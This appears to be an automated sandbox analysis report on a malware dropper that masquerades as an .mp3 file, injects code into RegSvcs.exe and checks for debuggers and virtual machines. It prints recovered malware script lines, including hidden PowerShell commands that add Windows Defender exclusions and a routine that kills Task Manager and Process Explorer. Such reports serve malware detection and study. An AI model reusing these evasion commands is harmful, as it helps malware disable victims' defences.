                Source: qwlvpmrupf.mp3.exe, 00000012.00000003.2215043797.00000000019DC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VboxService.exe
                Source: qwlvpmrupf.mp3.exe, 00000012.00000003.2213103873.0000000001988000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2215757310.000000000198A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2216123247.000000000198D000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2121860556.0000000001986000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VBoxTray.exe") Then
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeAPI call chain: ExitProcess graph end nodegraph_0-27815
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Process information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_003EF3FF BlockInput,7_2_003EF3FF
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeCode function: 0_2_00B26878 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00B26878
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_00375D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,7_2_00375D78
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeCode function: 0_2_00B2ECAA mov eax, dword ptr fs:[00000030h]0_2_00B2ECAA
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_00395078 mov eax, dword ptr fs:[00000030h]7_2_00395078
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 14_2_05561277 mov eax, dword ptr fs:[00000030h]14_2_05561277
                Source: C:\Windows\SysWOW64\OpenWith.exeCode function: 15_3_03280283 mov eax, dword ptr fs:[00000030h]15_3_03280283
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeCode function: 16_2_00DB5078 mov eax, dword ptr fs:[00000030h]16_2_00DB5078
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 17_2_066C7A45 mov eax, dword ptr fs:[00000030h]17_2_066C7A45
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 17_2_066CA22E mov eax, dword ptr fs:[00000030h]17_2_066CA22E
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 17_2_066CA28B mov eax, dword ptr fs:[00000030h]17_2_066CA28B
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeCode function: 0_2_00B32CE0 GetProcessHeap,0_2_00B32CE0
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeCode function: 0_2_00B26878 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00B26878
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeCode function: 0_2_00B2AAC4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00B2AAC4
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeCode function: 0_2_00B26A0B SetUnhandledExceptionFilter,0_2_00B26A0B
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeCode function: 0_2_00B25BBF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00B25BBF
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_003A29B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_003A29B2
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_00390BCF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00390BCF
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_00390D65 SetUnhandledExceptionFilter,7_2_00390D65
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_00390FB1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_00390FB1
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeCode function: 16_2_00DC29B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00DC29B2
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeCode function: 16_2_00DB0BCF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00DB0BCF
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeCode function: 16_2_00DB0D65 SetUnhandledExceptionFilter,16_2_00DB0D65
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeCode function: 16_2_00DB0FB1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_00DB0FB1
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: 14.2.RegSvcs.exe.310c174.2.raw.unpack, Flutter.csReference to suspicious API methods: VirtualAlloc(IntPtr.Zero, new IntPtr(65536), MEM_COMMIT, 4u)
                Source: 14.2.RegSvcs.exe.310c174.2.raw.unpack, Flutter.csReference to suspicious API methods: Marshal.WriteIntPtr(new IntPtr(intPtr.ToInt64() + num), GetProcAddress(moduleHandle, array[i]))
                Source: 14.2.RegSvcs.exe.310c174.2.raw.unpack, Flutter.csReference to suspicious API methods: VirtualProtect(intPtr, 65536u, 64u, out var _)
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Memory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 990000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeMemory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 1100000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeMemory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: BB0000 protect: page execute and read and write
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeMemory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 700000 protect: page execute and read and write
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 990000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 1100000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: BB0000 value starts with: 4D5A
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 700000 value starts with: 4D5A
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 990000Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 782000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 1100000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: FC5000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: BB0000
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 8CD000
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 700000
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 44A000
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_003D1A91 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,7_2_003D1A91
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_00373312 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,7_2_00373312
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $colitems = $owmi.execquery("select * from antivirusproduct")memstr_024668af-4
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: for $objantivirusproduct in $colitemsmemstr_839a4043-7
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $usb = $objantivirusproduct.displaynamememstr_3ea2d620-a
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nextmemstr_40f250bf-8
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: return $usbmemstr_6911e3a1-3
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endfunc ;==>antivirusmemstr_a788ce8f-d
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: func disabler()memstr_9cfc67f4-2
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;if antivirus() = "windows defender" thenmemstr_88363666-1
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;#requireadminmemstr_35a5b242-c
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell", " -command add-mppreference -exclusionpath " & @scriptdir, "", "", @sw_hide)memstr_e5f8c176-5
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionprocess 'regsvcs.exe'", "", "", @sw_hide)memstr_df9b808e-7
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '.vbs'", "", "", @sw_hide)memstr_63049b3f-0
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '.vbe'", "", "", @sw_hide)memstr_b10eb256-9
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '*.vbs'", "", "", @sw_hide)memstr_b6f8f66e-7
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '*.vbe'", "", "", @sw_hide)memstr_3c585536-a
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;endifmemstr_4dbc1717-4
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endfunc ;==>disablermemstr_0c69540c-4
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: func antianalysis()memstr_9d395c50-f
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if winexists("process explorer") thenmemstr_55a52968-2
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: winclose("process explorer")memstr_f11f3a3e-1
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: processclose("procexp64.exe")memstr_04f452c3-2
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: processclose("procexp.exe")memstr_bc9a639d-2
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if winexists("process hacker") thenmemstr_c7389a6e-6
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: winclose("process hacker")memstr_0432f897-0
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: processclose("processhacker.exe")memstr_2dceed27-f
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if processexists("taskmgr.exe") thenmemstr_90e183a4-5
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: processclose("taskmgr.exe")memstr_bebcb323-0
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if processexists("regshot.exe") thenmemstr_5784a0d4-a
                Source: ngPebbPhbp.exe, 00000000.00000002.1863627962.00000000055E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: defaulttabtip-mainui:memstr_a978b269-5
                Source: ngPebbPhbp.exe, 00000000.00000002.1863627962.00000000055E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ((((( hmemstr_7f0c42f0-2
                Source: ngPebbPhbp.exe, 00000000.00000002.1863627962.00000000055E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: excel.sheet.8@ntmemstr_c7ced7c8-2
                Source: ngPebbPhbp.exe, 00000000.00000002.1863627962.00000000055E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: apphvsiphvsmemstr_9496104c-3
                Source: ngPebbPhbp.exe, 00000000.00000002.1863627962.00000000055E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ((((( hmemstr_096a2b58-d
                Source: ngPebbPhbp.exe, 00000000.00000002.1863627962.00000000055E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ollate=c;lc_ctype=c;lc_monetary=c;lc_numeric=c;lc_time=cmemstr_61589bd2-c
                Source: ngPebbPhbp.exe, 00000000.00000002.1863627962.00000000055E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ollate=c;lc_ctype=c;lc_monetary=c;lc_numeric=c;lc_time=cqmemstr_b3b02830-2
                Source: ngPebbPhbp.exe, 00000000.00000003.1737245206.0000000003557000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: setup=rmxb.vbememstr_665cfb78-2
                Source: ngPebbPhbp.exe, 00000000.00000003.1737245206.0000000003557000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tempmodememstr_7e863389-f
                Source: ngPebbPhbp.exe, 00000000.00000003.1737245206.0000000003557000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: silent=1memstr_e1cbc0de-3
                Source: ngPebbPhbp.exe, 00000000.00000003.1737245206.0000000003557000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: h4~umemstr_ba216905-9
                Source: ngPebbPhbp.exe, 00000000.00000003.1737245206.0000000003557000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: h${umemstr_02e4e2c3-e
                Source: ngPebbPhbp.exe, 00000000.00000003.1737245206.0000000003557000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\appdata\local\temp\rarsfx0|memstr_40750185-0
                Source: ngPebbPhbp.exe, 00000000.00000003.1737245206.0000000003557000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\appdata\local\temp\rarsfx0memstr_8eb40578-9
                Source: ngPebbPhbp.exe, 00000000.00000003.1737245206.0000000003557000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2c\t4memstr_97ed82c2-0
                Source: ngPebbPhbp.exe, 00000000.00000003.1737245206.0000000003557000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @c\t4memstr_76fd42fb-e
                Source: ngPebbPhbp.exe, 00000000.00000003.1737245206.0000000003557000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ^c\t4memstr_2454207e-b
                Source: ngPebbPhbp.exe, 00000000.00000003.1737245206.0000000003557000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: richedit20wmemstr_5052e667-5
                Source: ngPebbPhbp.exe, 00000000.00000003.1737245206.0000000003557000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: swvd8memstr_dfdffd00-f
                Source: ngPebbPhbp.exe, 00000000.00000003.1737245206.0000000003557000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x-5o\memstr_4f6997ef-3
                Source: ngPebbPhbp.exe, 00000000.00000003.1737245206.0000000003557000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /c\t4memstr_d24ff1b4-f
                Source: ngPebbPhbp.exe, 00000000.00000003.1737245206.0000000003557000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: `hc\t4memstr_6373d10a-0
                Source: ngPebbPhbp.exe, 00000000.00000003.1737245206.0000000003557000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 7s45g6a2memstr_2589be0a-a
                Source: ngPebbPhbp.exe, 00000000.00000003.1737245206.0000000003557000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ch4mv6q5memstr_b63cdb2a-e
                Source: ngPebbPhbp.exe, 00000000.00000003.1737245206.0000000003557000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ch4mv6q5pmemstr_b32b9968-0
                Source: ngPebbPhbp.exe, 00000000.00000003.1736387700.0000000009885000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8y8y`memstr_75a35eae-b
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tkf91tf3memstr_2a6f684e-b
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: q^i[_imemstr_dad3041c-f
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _i|bimemstr_fad23d2b-f
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: aiiai3_imemstr_8d23938f-e
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _ie`ik_iwbimemstr_343cd8ec-4
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @ppj!jmemstr_53402124-6
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u<@ppj!jmemstr_3bd64218-6
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: us9q4unmemstr_020bc78a-3
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9{dtmemstr_10620e7a-f
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: i9{dtmemstr_3ebad243-7
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9{htmemstr_dea981ab-3
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: i9{htmemstr_9b8817df-e
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wj!j j memstr_4cab02a8-2
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4)mg;memstr_7a5475b7-4
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: i9|$(memstr_5db8855d-d
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$,0pwmemstr_bef5cbf5-d
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9|$(tmemstr_4997385d-3
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$,pwmemstr_f47f9642-d
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$,pjmemstr_4ad0b7cb-b
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$\pwhlmemstr_e6597ba5-f
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t$ph+memstr_d6a8de8f-9
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$8+d$0jmemstr_6260c4b4-3
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$<+d$4@pmemstr_44f1986e-7
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$<+d$4pmemstr_3d4de57d-e
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |$ t"jmemstr_a5691dc8-c
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: qqsvwmemstr_bd87c039-7
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pppppmemstr_f02066a6-1
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$ pjmemstr_ba660ce9-3
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$ pjh3memstr_84e60165-1
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$ pjh2memstr_a047b23e-7
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: )mwqwmemstr_906c6b60-2
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 54)mh )mvmemstr_e102f225-b
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ivyi}yimemstr_c520a37a-a
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #msvwtmemstr_2198d3b7-7
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$0vpsmemstr_86c20ff7-8
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$8psmemstr_403e2242-c
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$4psmemstr_3294e2cf-9
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9t$$tmemstr_1a4e3689-8
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$4pjmemstr_f220c57c-3
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |$$t@memstr_4ac238bf-8
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$0psmemstr_fe384605-7
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t)m;ememstr_4684017f-e
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x)m;ememstr_7840ee4f-b
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: *;5p)mmemstr_75a18f70-6
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 5p)m3memstr_fcc9342c-8
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ^954)mmemstr_30f7c86e-1
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f;54)mmemstr_d17741fe-9
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: )mjjj memstr_74bbd215-7
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gvpppppmemstr_87d2faa4-1
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: svjdjmemstr_e94bee72-7
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d@mvsfmemstr_a04fa46c-2
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ppj pppmemstr_35f215e7-2
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 954)mmemstr_b9bcdc27-f
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 954)m|~memstr_dc4bc644-8
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: i_^[]memstr_359baa52-d
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $svw3memstr_427d63a4-7
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: =l)mtmemstr_c82d6d11-9
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tysvjmemstr_09991138-5
                Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: =l)m^[tmemstr_1ed31cbc-4
